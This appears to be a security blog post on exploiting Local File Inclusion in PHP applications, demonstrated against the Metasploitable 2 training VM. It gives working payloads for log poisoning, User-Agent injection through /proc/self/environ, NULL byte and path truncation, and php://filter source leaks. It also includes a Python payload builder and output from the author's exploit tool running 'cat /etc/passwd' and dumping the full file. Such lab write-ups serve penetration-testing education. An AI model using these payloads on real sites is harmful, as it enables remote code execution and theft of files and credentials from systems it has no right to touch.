Hello,
Today, I played a bit with Metasploitable 2.
It is really easy to root, so that's not the interest of this blog post.
Anyhow, I played around a bit and ended up coding a basic LFI exploit tool.
So yet another post on LFI exploitation ...
So what is LFI?
LFI stands for Local File Inclusion.
It is a vulnerability where user input ends up in a file inclusion call (include/require in PHP), so the attacker chooses which local file the application includes.
Many people think it's not really dangerous as it only includes LOCAL files.
Unfortunately (depending on which side of the barrier you are on ...), that's false: you can execute code through an LFI.
So, how do you exploit it?
By including local files.
Yes, local files :).
These are the well-known techniques for LFI:
- Apache logs
- /proc/self/environ
- php://input
- NULL byte injection
- path truncation
- directory traversal
- PHP filters
- image inclusion with PHP code
Apache logs
These were world-readable on old distros. Nowadays they are only readable by the right users (root and the adm group on Debian/Ubuntu), not by the web server user.
You basically inject PHP code through a GET request:
http://victim/<?php system ('id'); ?>
This leaves the PHP code in the access log (a 404 is logged just like anything else). One catch: the '<' and '?' must reach the server unencoded. A browser or most HTTP libraries percent-encode them, Apache logs the encoded form, and PHP never sees an opening tag, so send the request by hand (netcat or a raw socket).
Then executing the PHP code is as simple as:
http://victim/?page=/var/log/apache2/access_log
(the file is access.log on Debian/Ubuntu, and access_log under /var/log/httpd on Red Hat-style systems.)
Code execution if the log is readable by the user PHP runs as (some old systems still are).
/proc/self/environ
This file shows the environment of the process reading it, and depending on how PHP is hooked into the web server, the request headers get exported into that environment (HTTP_USER_AGENT and so on). Since the include reads /proc/self/environ in the same request that carries your header, what you send is what gets included.
So, if you change your User-Agent to
<?php system ('id'); ?>
and use this:
http://victim/?page=/proc/self/environ
Yes, code execution!
php://input
This one executes the PHP code sent in the POST body: include the wrapper php://input and put the code in the request body. It needs allow_url_include = On (PHP treats this wrapper like a remote include), so it is rarer than the tricks above.
NULL byte injection and path truncation
This one is pretty neat. Say you have the following code:
<?php include ($_GET['page'] . '.php'); ?>
Well, you can get rid of the '.php' extension using that trick.
Either end your path with a NULL byte (%00), which terminates the string in the underlying C call, or append lots of /. (or just .) until the path is longer than MAXPATHLEN (4096 on Linux): the path gets normalized and truncated, and the appended extension falls off the end.
NULL byte poisoning doesn't work for PHP >= 5.3.4 as it's been fixed, so on those versions the truncation trick is what's left.
Reverse path truncation is mostly the same, just the ../ padding is before the file name (see the ush.it articles in the references).
PHP filters
This one is mainly for leaking files (.php sources and others): the base64 filter returns the file encoded instead of running it. It doesn't work if there's a prefix before your input, as here, because the wrapper has to be at the very start of the path (an appended '.php' is harmless, it just becomes part of the resource name):
<?php include ($prefix . $_GET['page'] . '.php'); ?>
You exploit it using this request for instance:
http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php
As you guessed, the PHP filter is
php://filter/read=convert.base64-encode/resource=<file>
and you base64-decode the output to get the source.
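Added example covering the extension tricks and the filter leak from the two sections above (my code, not the post's tool). The MAXPATHLEN value assumes a Linux target, the version cut-off is the one the post gives for the NULL byte fix, and the leaked file and the page around it are constructed for the demo.

```python
"""Payloads for getting rid of an appended '.php', and for leaking source
with php://filter.  Added example, not the post's tool.  The target
version strings, the leaked file and the HTML around it are constructed.
"""
import base64
import re
from typing import Optional

MAXPATHLEN = 4096          # assumption: Linux target; PHP cuts paths longer than this
NULL_BYTE_FIX = (5, 3, 4)  # per the post: NULL byte poisoning fixed from PHP 5.3.4 on


def null_byte(path: str) -> str:
    """include($_GET['page'] . '.php') opens only `path`: the C string ends at %00."""
    return path + "%00"


def path_truncation(path: str, pad: str = "/.", limit: int = MAXPATHLEN) -> str:
    """Pad with '/.' until the string is longer than MAXPATHLEN.  PHP normalises
    and truncates the path, so the '.php' appended after the padding is cut
    off.  This still works on versions where %00 no longer does."""
    reps = (limit - len(path)) // len(pad) + 1
    return path + pad * reps


def null_byte_worth_trying(powered_by: str) -> Optional[bool]:
    """Decide from an X-Powered-By header value whether %00 can still work.
    Returns None when no PHP version is advertised."""
    m = re.search(r"PHP/(\d+)\.(\d+)\.(\d+)", powered_by)
    if not m:
        return None
    return tuple(int(x) for x in m.groups()) < NULL_BYTE_FIX


def filter_wrapper(resource: str) -> str:
    """php://filter source leak.  Only works when the parameter is the *start*
    of the included path; an appended '.php' is harmless (it joins the
    resource name)."""
    return "php://filter/read=convert.base64-encode/resource=" + resource


B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_leak(body: str) -> str:
    """Pull the longest base64 run out of the HTML page the include lands in
    and decode it back to the file's source."""
    runs = list(B64_RUN.finditer(body))
    if not runs:
        raise ValueError("no base64 blob in response")
    blob = max(runs, key=lambda m: len(m.group())).group()
    return base64.b64decode(blob).decode("utf-8", errors="replace")


# Constructed sample: a leaked config file and the page it would be echoed into.
SAMPLE_SOURCE = "<?php\n$db_user = 'root';\n$db_pass = 'secret';\n"
SAMPLE_LEAK_BODY = ("<html><body>"
                    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
                    + "</body></html>")


if __name__ == "__main__":
    print(null_byte("../../../etc/passwd"))
    print(len(path_truncation("../../../etc/passwd")), "chars of truncation payload")
    print("%00 worth trying on PHP/5.2.4-2ubuntu5.10:",
          null_byte_worth_trying("PHP/5.2.4-2ubuntu5.10"))
    print(filter_wrapper("index"))
    print(decode_filter_leak(SAMPLE_LEAK_BODY))
```

Metasploitable 2 advertises PHP 5.2.4 in X-Powered-By, which is why both %00 and the truncation padding are worth keeping in a tool; against anything 5.3.4 or later only the padding remains.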
image with PHP code
This one is about appending PHP code to an image.
Including the image through the LFI runs that code: include() executes whatever sits between <?php ?> tags in any file, whatever its extension, and simply echoes the bytes around it (the image data).
If the LFI can't be exploited through /proc/self/environ or the Apache logs, and no extension is appended to the parameter, being able to upload an image is enough to turn it into code execution.
Let's say you have phpBB and PhpLdapAdmin 1.1.0.5.
Well, you can upload an image carrying PHP code through phpBB, then exploit the LFI in PhpLdapAdmin with the directory traversal trick to include that image => code execution.
Exploit
I wrote a basic LFI exploiter that uses the PHP filter or /proc/self/environ tricks.
You can get it at LFI exploit tool.
The code isn't clean and it needs a lot of improvement before being a really usable tool. I plan to improve it on an as-needed basis. The cookie functionality is not implemented yet, it is just a placeholder for now.
You can test it on Mutillidae on Metasploitable 2. I haven't tested it anywhere else yet.
Example usage (this is on Metasploitable 2):
$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
                      [--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     URL to attack
  --action ACTION, -a ACTION
                        exec or read (default)
  --option OPTION, -o OPTION
                        Action argument
  --replace REPLACE, -r REPLACE
                        string to replace
  --cookie COOKIE, -c COOKIE
                        Cookie

$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
Conclusion
As you can see from this introduction, code execution is quite possible with an LFI. These aren't only information leak vulnerabilities.
That's all for today.
Cheers,
m_101
Updates
- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.
References
- Basics on file inclusion : http://www.blackhatlibrary.net/File_Inclusion
- PhpLdapAdmin LFI : http://www.exploit-db.com/exploits/10410/
- path truncation part 1 : http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
- path truncation part 2 : http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/